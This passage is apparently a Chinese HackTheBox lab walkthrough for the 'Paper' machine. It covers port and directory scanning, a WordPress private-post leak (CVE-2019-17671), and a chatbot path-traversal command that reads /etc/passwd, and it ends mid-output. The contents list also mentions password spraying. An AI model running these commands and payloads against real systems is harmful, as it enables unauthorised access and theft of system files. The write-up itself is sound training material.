马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?立即注册
x
目录
毗连至HTB服务器并启动靶机
信息网络
使用rustscan对靶机TCP端口举行开放扫描
将靶机TCP开放端标语提取并生存
使用nmap对靶机TCP开放端口举行脚本、服务扫描
使用nmap对靶机TCP开放端口举行漏洞、体系扫描
使用nmap对靶机常用UDP端口举行开放扫描
对靶机举行子域名FUZZ
编辑
对靶机主域名举行路径FUZZ
使用curl访问靶机主域名
对该域名举行路径FUZZ
界限突破
使用浏览器访问靶机背景域名/wp-admin路径
使用searchsploit搜索该CMS漏洞
查察该PoC内容
仿照PoC构造URL访问static=1的页面
使用浏览器访问秘密链接
点击左侧的general进入频道
使用hydra对靶机SSH服务举行密码喷洒
使用上述根据登录靶机SSH服务
权限提升
查察该用户可sudo执行的二进制文件
查找体系内的SUID文件
查找体系内的CAP_SUID文件
利用靶机从攻击机中下载linpeas.sh
为该脚本赋权并执行
在Github上探求EXP
控制靶机将该EXP举行下载
毗连至HTB服务器并启动靶机
靶机IP:
分配IP:10.10.16.13
信息网络
使用rustscan对靶机TCP端口举行开放扫描
- rustscan -a 10.10.11.143 -r 1-65535 --ulimit 5000 | tee res
将靶机TCP开放端标语提取并生存
- ports=$(grep syn-ack res | cut -d/ -f1 | paste -sd,)
└─# grep syn-ack res | cut -d/ -f1 | paste -sd,
22,80,443
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep syn-ack res | cut -d/ -f1 | paste -sd,)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
22,80,443
使用nmap对靶机TCP开放端口举行脚本、服务扫描
- nmap -sT -p$ports -sCV -Pn 10.10.11.143
使用nmap对靶机TCP开放端口举行漏洞、体系扫描
- nmap -sT -p$ports --script=vuln -O -Pn 10.10.11.143
使用nmap对靶机常用UDP端口举行开放扫描
- nmap -sU --top-ports 20 -Pn 10.10.11.143
对靶机举行子域名FUZZ
- ffuf -u http://paper.htb/ -H 'Host: FUZZ.paper.htb' -w ../dictionary/subdomains-top5000.txt -fw 1,2703
对靶机主域名举行路径FUZZ
- ffuf -u http://paper.htb/FUZZ -w ../dictionary/dic-big.txt -t 200
使用curl访问靶机主域名
- curl -I http://10.10.11.143
- 由输出的相应头可见,靶机后端服务器域名为:office.paper
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.143
HTTP/1.1 403 Forbidden
Date: Sat, 11 Jan 2025 06:10:25 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
- sed -i '1i 10.10.11.143 office.paper' /etc/hosts
└─# sed -i '1i 10.10.11.143 office.paper' /etc/hosts
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# head -n1 /etc/hosts
10.10.11.143 office.paper
对该域名举行路径FUZZ
- ffuf -u http://office.paper/FUZZ -w ../dictionary/dic-big.txt
界限突破
使用浏览器访问靶机背景域名/wp-admin路径
使用searchsploit搜索该CMS漏洞
- searchsploit wordpress 5.2.3
- 我注意到5.2.3存在未授权查察他人私密帖的PoC将其拷贝到当前目录
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 47690.md
Exploit: WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
URL: https://www.exploit-db.com/exploits/47690
Path: /usr/share/exploitdb/exploits/multiple/webapps/47690.md
Codes: CVE-2019-17671
Verified: False
File Type: ASCII text
Copied to: /home/kali/Desktop/temp/47690.md
查察该PoC内容
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat 47690.md
So far we know that adding `?static=1` to a wordpress URL should leak its secret content
Here are a few ways to manipulate the returned entries:
- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:
仿照PoC构造URL访问static=1的页面
- 颠末简单的翻译可知,此人将秘密都放在了:http://chat.office.paper/register/8qozr226AhkCHZdyY
测试
迈克尔,看在天主的份上,请把草稿中的秘密去掉!
你好,Blunder蒂芬的员工,
由于上级的命令,每个加入这个博客的员工都被删除了,他们被迁徙到我们新的聊天体系。
所以,我恳请你们所有人把你们的讨论从公共博客带到一个更私人的聊天体系。
- 尼克
#告诫迈克尔
迈克尔,你必须制止在草稿中添加秘密。这是一个巨大的安全问题,你必须制止这样做。
半夜威胁等级
电影银幕,
编剧和导演是
迈克尔·斯科特
[INT:DAY]
在联邦观察局内部,特工迈克尔·斯卡恩坐在办公桌上。他的机器人管家德怀特
#新员工聊天体系的秘密注册URL
http://chat.office.paper/register/8qozr226AhkCHZdyY
#我保持这个草案未发布,因为未发布的草案不能被外部人员访问。我没那么无知尼克
#别再看我的草稿了天啊!
- sed -i '1i 10.10.11.143 chat.office.paper' /etc/hosts
└─# sed -i '1i 10.10.11.143 chat.office.paper' /etc/hosts
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# head -n3 /etc/hosts
10.10.11.143 chat.office.paper
10.10.11.143 office.paper
10.10.11.143 paper.htb
使用浏览器访问秘密链接
- 去掉相对路径后,访问主页面可见是一个登录界面,因此我们需要注册一个账号
点击左侧的general进入频道
- 由聊天记载可知,recyclops是一个机器人,跟它私聊发送`help`得到使用手册
你好我是Recyclops。德怀特指派的机器人。我会有我的抨击地球人,但在此之前,我必须帮助我的酷朋侪德怀特回答他的同事问的恼人的问题,这样他就可以利用他宝贵的时间来.不和同事交流
最常见的问题包括:
- 现在几点了?
- 您的销售目录中有哪些新文件?
- 售货员为什么要过马路?
- 你的销售目录中x文件的内容是什么?等
请注意,我是一个测试版,我仍旧有一些错误要修复。
怎样使用我?:
1. Small Talk:
你可以问我德怀特的周末怎么样,大概他昨晚看了比赛吗等等。
你周末过得怎么样?大概‘你昨晚看比赛了吗?大概“什么样的熊是最好的?
2.笑话:
你可以问我为什么售货员要过马路。
为什么售货员要穿过马路?'
<==以下两个功能是针对那些仍旧不知道怎样使用scp的笨伯的。我看着你,凯文。
出于安全原因,访问权限仅限于Sales文件夹。
3.档案:
例如:'cloops get me the file test.txt',或'cloops could you send me the file sale/secret.xls',或'cloops file test.txt'
4.列表:
你可以让我列出
例如:'recyclops i need directory list sale' or just 'recyclops list sale'
5.时间:
你可以问我几点了
现在几点了?大概只是“马蹄声时间”
这就是我现在能做的。
还有,德怀特是个很酷的家伙,而不是时间小偷!
读取文件内容命令:recyclops file test.txt
列出目录文件命令:list
- recyclops file ../../../../../etc/passwd
- <!=====Contents of file ../../../../../etc/passwd=====>
- root❌0:0:root:/root:/bin/bash
bin❌1:1:bin:/bin:/sbin/nologin
daemon❌2:2:daemon:/sbin:/sbin/nologin
adm❌3:4:adm:/var/adm:/sbin/nologin
lp❌4:7:lp:/var/spool/lpd:/sbin/nologin
sync❌5:0:sync:/sbin:/bin/sync
shutdown❌6:0:shutdown:/sbin:/sbin/shutdown
halt❌7:0:halt:/sbin:/sbin/halt
mail❌8:12:mail:/var/spool/mail:/sbin/nologin
operator❌11:0 perator:/root:/sbin/nologin
games❌12
|
